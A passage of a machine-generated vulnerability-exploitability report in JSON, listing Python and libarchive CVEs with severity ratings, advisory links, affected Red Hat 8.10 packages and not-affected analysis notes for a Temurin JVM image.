          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8291"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2025-23342.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2025:23342"
        },
        {
          "url": "https://github.com/python/cpython/commit/4455cbabf991e202185a25a631af206f60bbc949"
        },
        {
          "url": "https://github.com/python/cpython/commit/6eb6c5dbfb528bd07d77b60fd71fd05d81d45c41"
        },
        {
          "url": "https://github.com/python/cpython/commit/6eb6c5dbfb528bd07d77b60fd71fd05d81d45c41%20%28main%29"
        },
        {
          "url": "https://github.com/python/cpython/commit/8d1b3dfa09135affbbf27fb8babcf3c11415df49"
        },
        {
          "url": "https://github.com/python/cpython/commit/ab0893fd5c579d9cea30841680e6d35fc478afb5"
        },
        {
          "url": "https://github.com/python/cpython/commit/d851f8e258c7328814943e923a7df81bca15df4b"
        },
        {
          "url": "https://github.com/python/cpython/commit/f3c6f882cddc8dc30320d2e73edf019e201394fc"
        },
        {
          "url": "https://github.com/python/cpython/commit/fdc9d214c01cb4588f540cfa03726bbf2a33fc15"
        },
        {
          "url": "https://github.com/python/cpython/issues/135462"
        },
        {
          "url": "https://github.com/python/cpython/pull/135464"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-6069.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2025-23530.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/K5PIYLR6EP3WR7ZOKKYQUWEDNQVUXOYM/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6069"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7710-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-6069"
        }
      ],
      "published": "2025-06-17T14:15:33+00:00",
      "updated": "2026-07-31T14:16:45+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2025-6075",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        400
      ],
      "description": "If the value passed to os.path.expandvars() is user-controlled a \nperformance degradation is possible when expanding environment \nvariables.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-6075"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:23342"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19064"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-6075"
        },
        {
          "url": "https://bugzilla.redhat.com/2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/2449649"
        },
        {
          "url": "https://bugzilla.redhat.com/2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/2458049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2294682"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2373234"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2402342"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2408891"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5642"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6069"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6075"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8291"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-19064.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2025:23342"
        },
        {
          "url": "https://github.com/python/cpython/commit/2e6150adccaaf5bd95d4c19dfd04a36e0b325d8c"
        },
        {
          "url": "https://github.com/python/cpython/commit/5dceb93486176e6b4a6d9754491005113eb23427"
        },
        {
          "url": "https://github.com/python/cpython/commit/631ba3407e3348ccd56ce5160c4fb2c5dc5f4d84"
        },
        {
          "url": "https://github.com/python/cpython/commit/892747b4cf0f95ba8beb51c0d0658bfaa381ebca"
        },
        {
          "url": "https://github.com/python/cpython/commit/9ab89c026aa9611c4b0b67c288b8303a480fe742"
        },
        {
          "url": "https://github.com/python/cpython/commit/c8a5f3435c342964e0a432cc9fb448b7dbecd1ba"
        },
        {
          "url": "https://github.com/python/cpython/commit/f029e8db626ddc6e3a3beea4eff511a71aaceb5c"
        },
        {
          "url": "https://github.com/python/cpython/issues/136065"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-6075.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-19177.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/IUP5QJ6D4KK6ULHOMPC7DPNKRYQTQNLA/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6075"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7886-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7886-2"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8614-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-6075"
        }
      ],
      "published": "2025-10-31T17:15:48+00:00",
      "updated": "2026-07-31T14:16:45+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": "Exploitability analysis, additional details:\nTemurin JVM binary is linked only against glibc:\n$ ldd /usr/lib/jvm/temurin-17-jre/bin/java\n        linux-vdso.so.1 (0x0000ffff8cd00000)\n        libjli.so => /usr/lib/jvm/temurin-17-jre/bin/../lib/libjli.so (0x0000ffff8cc70000)\n        libpthread.so.0 => /lib64/libpthread.so.0 (0x0000ffff8cc3b000)\n        libdl.so.2 => /lib64/libdl.so.2 (0x0000ffff8cc1a000)\n        libc.so.6 => /lib64/libc.so.6 (0x0000ffff8caa4000)\n        /lib/ld-linux-aarch64.so.1 (0x0000ffff8ccc2000)"
      }
    },
    {
      "id": "CVE-2025-60753",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        400,
        835
      ],
      "description": "An issue was discovered in libarchive bsdtar before version 3.8.1 in function apply_substitution in file tar/subst.c when processing crafted -s substitution rules. This can cause unbounded memory allocation and lead to denial of service (Out-of-Memory crash).",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-60753"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-60753"
        },
        {
          "url": "https://github.com/Papya-j/CVE/tree/main/CVE-2025-60753"
        },
        {
          "url": "https://github.com/libarchive/libarchive/issues/2725"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-60753"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8147-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-60753"
        }
      ],
      "published": "2025-11-05T16:15:40+00:00",
      "updated": "2026-06-17T09:50:05+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.3.3-7.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
